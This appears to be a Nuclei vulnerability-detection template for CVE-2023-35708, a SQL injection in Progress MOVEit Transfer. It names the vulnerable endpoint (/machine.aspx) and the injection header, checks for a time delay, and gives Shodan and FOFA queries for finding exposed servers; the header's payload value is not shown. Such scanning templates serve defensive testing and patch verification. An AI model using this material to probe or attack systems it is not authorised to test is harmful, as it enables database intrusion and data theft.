id: CVE-2023-35708

info:
  name: MOVEit Transfer - SQL Injection
  author: daffainfo,jjcho
  severity: critical
  description: |
    In Progress MOVEit Transfer before 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), and 2023.0.3 (15.0.3), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to MOVEit Transfer's database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content. These are fixed versions of the DLL drop-in: 2020.1.10 (12.1.10), 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), and 2023.0.3 (15.0.3).
  impact: |
    Attackers can modify and disclose sensitive database content, leading to data breach and potential system compromise.
  remediation: |
    Update to fixed versions: 2020.1.10, 2021.0.8, 2021.1.6, 2022.0.6, 2022.1.7, or latest available version.
  reference:
    - https://x.com/wvuuuuuuuuuuuuu/status/1679969146635710469
    - https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-15June2023
    - https://www.progress.com/security/moveit-transfer-and-moveit-cloud-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2023-35708
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-35708
    cwe-id: CWE-89
    epss-score: 0.81216
    epss-percentile: 0.99188
    cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: progress
    product: moveit_transfer
    shodan-query: http.favicon.hash:989289239
    fofa-query: icon_hash=989289239
  tags: cve,cve2023,moveit,sqli,progress,vkev,vuln

http:
  - raw:
      - |
        @timeout: 20s
        GET /machine.aspx HTTP/1.1
        Host: {{Hostname}}
        X-IPSGW-ClientCert: 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

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'

      - type: word
        part: body
        words:
          - ''
          - ''
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022063e1c31b3044e6851189a41866842fd68ffe2967a0c46cdbca6e312294aec51f022100a863c86fdf19bd05e5761fb9f65f52fee847fe02bf40dc0f8a75132d87821d2e:922c64590222798bb761d5b6d8e72950